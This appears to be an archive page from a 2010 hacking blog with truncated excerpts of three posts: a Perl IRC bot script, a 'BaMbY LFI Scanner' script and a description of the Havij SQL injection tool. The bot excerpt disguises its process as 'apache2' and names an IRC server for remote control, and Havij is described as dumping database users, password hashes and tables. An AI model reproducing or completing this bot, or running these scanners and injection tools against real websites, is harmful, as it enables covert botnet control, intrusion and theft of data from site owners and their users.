#!/usr/bin/perl$powered="ByroeNet";$mail="admin(at)byroe.net";#######################################################use HTTP::Request;use LWP::UserAgent;use IO::Socket;use IO::Select;use IO::Socket::INET;use Socket;use HTTP::Request::Common;use LWP::Simple;use LWP 5.64;use HTTP::Request::Common qw(POST);use Digest::MD5 qw(md5_hex);use MIME::Base64;my $fakeproc = "/usr/sbin/apache2 -k start";$ircserver = "irc.kill-9.server.or.id";my $ircport = "6667";my $nickname = "loveYou";my $ident = "love";my...
Friday, November 12, 2010
Thursday, November 11, 2010
BaMbY LFI Scanner
#!/usr/bin/perl$powered="BaMbY";$mail="admin(at)bamby.web.id"; ################################################################################# ## 28/05/2010 ## Author : BaMbY ## Team : Irc.Konthol.Net ## WebSite : http://www.bamby.web.id ## Contact : admin(at)bamby.web.id ...
Wednesday, November 10, 2010
Havij v1.1: Advanced SQL Injection
Author: kill-9
| Posted at: 11:37 PM |
Filed Under:
Hacking Stuff,
SQL


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing...
Subscribe to:
Posts (Atom)